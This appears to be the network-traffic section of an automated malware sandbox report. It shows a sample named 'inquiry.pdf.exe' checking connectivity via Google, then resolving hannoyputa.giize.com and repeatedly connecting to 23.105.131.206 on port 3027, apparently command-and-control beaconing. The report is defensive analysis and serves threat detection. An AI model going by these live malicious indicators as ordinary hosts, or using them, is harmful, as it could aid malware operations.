                                                                                                            Oct 3, 2022 17:28:40.584929943 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:40.585051060 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:40.734116077 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:40.734179020 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:40.795495987 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:40.795675993 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:40.802371979 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:40.802409887 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:40.802769899 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:40.846744061 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.228228092 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.228255987 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.516992092 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.517059088 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.517091036 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.517129898 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.517175913 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.517205000 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.517227888 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.517805099 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.517894030 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.517916918 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.519021988 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.519124985 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.519148111 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.520224094 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.520308971 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.520334005 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.521435022 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.521518946 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.521544933 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.534156084 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.534282923 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.534310102 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.534676075 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.534759998 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.534780025 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.535824060 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.535906076 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.535927057 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.537259102 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.537292957 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.537352085 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.537374020 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.537420034 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.538482904 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.539699078 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.539729118 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.539792061 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.539815903 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.539870977 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.540880919 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.542035103 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.542063951 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.542104959 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.542128086 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.542175055 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.543072939 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.544183969 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.544219017 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.544255972 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.544279099 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.544325113 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.545320988 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.546353102 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.546386957 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.546432972 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.546458960 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.546499968 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.547485113 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.548558950 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.548649073 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.548671007 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.548737049 CEST44349699142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:28:41.548785925 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:28:41.560120106 CEST49699443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:36.619597912 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:36.619666100 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:36.620533943 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:36.647135019 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:36.647180080 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:36.705720901 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:36.705907106 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:36.708970070 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:36.709007025 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:36.709566116 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:36.757956982 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.103657007 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.103739977 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.441360950 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.441466093 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.441523075 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.441524029 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.441566944 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.441608906 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.441625118 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.442158937 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.442214966 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.442225933 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.442254066 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.442292929 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.443370104 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.444585085 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.444643021 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.444657087 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.444685936 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.444730997 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.445770979 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.458484888 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.458556890 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.458585024 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.458623886 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.458666086 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.458872080 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.460072994 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.460133076 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.460141897 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.460169077 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.460217953 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.460227966 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.501976013 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.502046108 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.502099991 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.502137899 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.502193928 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.502660036 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.503401041 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.503453970 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.503484011 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.503510952 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.503552914 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.504296064 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.505053043 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.505114079 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.505151987 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.505184889 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.505227089 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.505790949 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.506607056 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.506660938 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.506681919 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.506707907 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.506750107 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.507370949 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.508133888 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.508188963 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.508200884 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.508223057 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.508265972 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.508939981 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.509795904 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.509879112 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.509907007 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.510111094 CEST44349705142.250.203.100192.168.2.3
                                                                                                            Oct 3, 2022 17:29:37.510165930 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:29:37.520004988 CEST49705443192.168.2.3142.250.203.100
                                                                                                            Oct 3, 2022 17:30:30.431647062 CEST497063027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:30.535955906 CEST30274970623.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:31.043787003 CEST497063027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:31.148993015 CEST30274970623.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:31.653069973 CEST497063027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:31.757318974 CEST30274970623.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:36.999707937 CEST497073027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:37.103744030 CEST30274970723.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:37.606795073 CEST497073027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:37.710974932 CEST30274970723.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:38.221945047 CEST497073027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:38.326092958 CEST30274970723.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:43.524986029 CEST497083027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:43.629245043 CEST30274970823.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:44.138529062 CEST497083027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:44.242737055 CEST30274970823.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:44.747955084 CEST497083027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:44.852093935 CEST30274970823.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:50.277126074 CEST497093027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:50.381067991 CEST30274970923.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:50.889133930 CEST497093027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:50.993158102 CEST30274970923.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:51.498590946 CEST497093027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:51.602624893 CEST30274970923.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:56.952766895 CEST497103027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:57.056588888 CEST30274971023.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:57.561630011 CEST497103027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:57.665577888 CEST30274971023.105.131.206192.168.2.3
                                                                                                            Oct 3, 2022 17:30:58.170969009 CEST497103027192.168.2.323.105.131.206
                                                                                                            Oct 3, 2022 17:30:58.275015116 CEST30274971023.105.131.206192.168.2.3

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Oct 3, 2022 17:28:40.540024042 CEST6270453192.168.2.38.8.8.8
                                                                                                            Oct 3, 2022 17:28:40.559189081 CEST53627048.8.8.8192.168.2.3
                                                                                                            Oct 3, 2022 17:29:36.573261976 CEST5799053192.168.2.38.8.8.8
                                                                                                            Oct 3, 2022 17:29:36.590500116 CEST53579908.8.8.8192.168.2.3
                                                                                                            Oct 3, 2022 17:30:30.254084110 CEST5238753192.168.2.38.8.8.8
                                                                                                            Oct 3, 2022 17:30:30.422929049 CEST53523878.8.8.8192.168.2.3
                                                                                                            Oct 3, 2022 17:30:36.808413029 CEST5692453192.168.2.38.8.8.8
                                                                                                            Oct 3, 2022 17:30:36.979670048 CEST53569248.8.8.8192.168.2.3
                                                                                                            Oct 3, 2022 17:30:43.343605042 CEST6062553192.168.2.38.8.8.8
                                                                                                            Oct 3, 2022 17:30:43.514852047 CEST53606258.8.8.8192.168.2.3
                                                                                                            Oct 3, 2022 17:30:50.139025927 CEST4930253192.168.2.38.8.8.8
                                                                                                            Oct 3, 2022 17:30:50.276540995 CEST53493028.8.8.8192.168.2.3
                                                                                                            Oct 3, 2022 17:30:56.782484055 CEST5397553192.168.2.38.8.8.8
                                                                                                            Oct 3, 2022 17:30:56.952225924 CEST53539758.8.8.8192.168.2.3

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Oct 3, 2022 17:28:40.540024042 CEST192.168.2.38.8.8.80x3d81Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                            Oct 3, 2022 17:29:36.573261976 CEST192.168.2.38.8.8.80x809fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                            Oct 3, 2022 17:30:30.254084110 CEST192.168.2.38.8.8.80x6f9cStandard query (0)hannoyputa.giize.comA (IP address)IN (0x0001)false
                                                                                                            Oct 3, 2022 17:30:36.808413029 CEST192.168.2.38.8.8.80xe730Standard query (0)hannoyputa.giize.comA (IP address)IN (0x0001)false
                                                                                                            Oct 3, 2022 17:30:43.343605042 CEST192.168.2.38.8.8.80xe4cdStandard query (0)hannoyputa.giize.comA (IP address)IN (0x0001)false
                                                                                                            Oct 3, 2022 17:30:50.139025927 CEST192.168.2.38.8.8.80xbde2Standard query (0)hannoyputa.giize.comA (IP address)IN (0x0001)false
                                                                                                            Oct 3, 2022 17:30:56.782484055 CEST192.168.2.38.8.8.80x4171Standard query (0)hannoyputa.giize.comA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Oct 3, 2022 17:28:40.559189081 CEST8.8.8.8192.168.2.30x3d81No error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
                                                                                                            Oct 3, 2022 17:29:36.590500116 CEST8.8.8.8192.168.2.30x809fNo error (0)www.google.com142.250.203.100A (IP address)IN (0x0001)false
                                                                                                            Oct 3, 2022 17:30:30.422929049 CEST8.8.8.8192.168.2.30x6f9cNo error (0)hannoyputa.giize.com23.105.131.206A (IP address)IN (0x0001)false
                                                                                                            Oct 3, 2022 17:30:36.979670048 CEST8.8.8.8192.168.2.30xe730No error (0)hannoyputa.giize.com23.105.131.206A (IP address)IN (0x0001)false
                                                                                                            Oct 3, 2022 17:30:43.514852047 CEST8.8.8.8192.168.2.30xe4cdNo error (0)hannoyputa.giize.com23.105.131.206A (IP address)IN (0x0001)false
                                                                                                            Oct 3, 2022 17:30:50.276540995 CEST8.8.8.8192.168.2.30xbde2No error (0)hannoyputa.giize.com23.105.131.206A (IP address)IN (0x0001)false
                                                                                                            Oct 3, 2022 17:30:56.952225924 CEST8.8.8.8192.168.2.30x4171No error (0)hannoyputa.giize.com23.105.131.206A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • www.google.com

                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                            0192.168.2.349699142.250.203.100443C:\Users\user\Desktop\inquiry.pdf.exe
                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                            2022-10-03 15:28:41 UTC0OUTGET / HTTP/1.1
                                                                                                            Host: www.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2022-10-03 15:28:41 UTC0INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 03 Oct 2022 15:28:41 GMT
                                                                                                            Expires: -1
                                                                                                            Cache-Control: private, max-age=0
                                                                                                            Content-Type: text/html; charset=ISO-8859-1
                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                            Server: gws
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Set-Cookie: AEC=AakniGNWZfgimimfVhqw9CfDOqnGP1vTToCig1K_-SLyPOOl3rxx4lxqdeM; expires=Sat, 01-Apr-2023 15:28:41 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                            Set-Cookie: __Secure-ENID=7.SE=AFIKxW9QJiTUV8ZxzSNX3GGV6kwaBKfI9lpir0ygx5Ywy2s-ifT_-GdWChX6sQd5lX7qZFa1gN4fpWJrVvKWznXPej0FrcoIMsFM3kLrzou-r51s-JoawqlwD8N9qt3A5sIohbc8Juga8lbnUPl2fQhCpWpaVV11QRnZjg1nppM; expires=Fri, 03-Nov-2023 07:46:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                            Set-Cookie: CONSENT=PENDING+540; expires=Wed, 02-Oct-2024 15:28:41 GMT; path=/; domain=.google.com; Secure
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                            Accept-Ranges: none
                                                                                                            Vary: Accept-Encoding
                                                                                                            Connection: close
                                                                                                            Transfer-Encoding: chunked
                                                                                                            2022-10-03 15:28:41 UTC1INData Raw: 35 34 63 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c
                                                                                                            Data Ascii: 54c2<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta content="text/html
                                                                                                            2022-10-03 15:28:41 UTC1INData Raw: 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 52 54 4d 69 41 57 6d 47 6d 39 4c 4a 45 6a 59 75 79 6d 4e 4a 39 41 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d 7b 6b 45 49 3a 27 71 66 38 36 59 39 65 51 46 63 48 59 31 73 51 50 34 50 43 4e 38 41 73 27 2c 6b
                                                                                                            Data Ascii: ; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="RTMiAWmGm9LJEjYuymNJ9A">(function(){window.google={kEI:'qf86Y9eQFcHY1sQP4PCN8As',k
                                                                                                            2022-10-03 15:28:41 UTC2INData Raw: 33 2c 36 39 37 2c 37 35 2c 31 37 2c 35 39 39 35 38 33 32 2c 32 38 30 33 34 30 31 2c 33 33 31 31 2c 31 34 31 2c 37 39 35 2c 31 39 37 33 35 2c 31 2c 31 2c 33 34 36 2c 31 36 34 39 2c 35 2c 33 2c 33 2c 31 2c 31 2c 31 2c 39 30 2c 36 30 2c 31 36 2c 32 2c 36 2c 31 2c 34 2c 33 2c 37 34 35 31 37 37 39 2c 31 36 34 39 36 38 36 31 2c 34 36 39 2c 34 30 34 31 36 37 33 2c 31 39 36 34 2c 33 30 39 34 2c 31 33 35 37 38 2c 33 34 30 36 2c 31 31 37 34 36 2c 31 34 32 31 32 39 37 27 2c 6b 42 4c 3a 27 67 55 66 63 27 7d 3b 67 6f 6f 67 6c 65 2e 73 6e 3d 27 77 65 62 68 70 27 3b 67 6f 6f 67 6c 65 2e 6b 48 4c 3d 27 65 6e 2d 47 42 27 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 66 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 68 2c 6b 3d 5b 5d 3b 66 75 6e 63
                                                                                                            Data Ascii: 3,697,75,17,5995832,2803401,3311,141,795,19735,1,1,346,1649,5,3,3,1,1,1,90,60,16,2,6,1,4,3,7451779,16496861,469,4041673,1964,3094,13578,3406,11746,1421297',kBL:'gUfc'};google.sn='webhp';google.kHL='en-GB';})();(function(){var f=this||self;var h,k=[];func
                                                                                                            2022-10-03 15:28:41 UTC3INData Raw: 6e 21 31 7d 3b 67 6f 6f 67 6c 65 2e 73 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 73 79 2e 70 75 73 68 28 61 29 7d 3b 67 6f 6f 67 6c 65 2e 6c 6d 3d 5b 5d 3b 67 6f 6f 67 6c 65 2e 70 6c 6d 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 6c 6d 2e 70 75 73 68 2e 61 70 70 6c 79 28 67 6f 6f 67 6c 65 2e 6c 6d 2c 61 29 7d 3b 67 6f 6f 67 6c 65 2e 6c 71 3d 5b 5d 3b 67 6f 6f 67 6c 65 2e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 5b 61 5d 2c 62 2c 63 5d 29 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 61 64 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 61 2c 62 5d 29 7d 3b 67 6f 6f 67 6c 65 2e 62 78 3d 21 31 3b 67 6f 6f 67 6c
                                                                                                            Data Ascii: n!1};google.sx=function(a){google.sy.push(a)};google.lm=[];google.plm=function(a){google.lm.push.apply(google.lm,a)};google.lq=[];google.load=function(a,b,c){google.lq.push([[a],b,c])};google.loadAll=function(a,b){google.lq.push([a,b])};google.bx=!1;googl
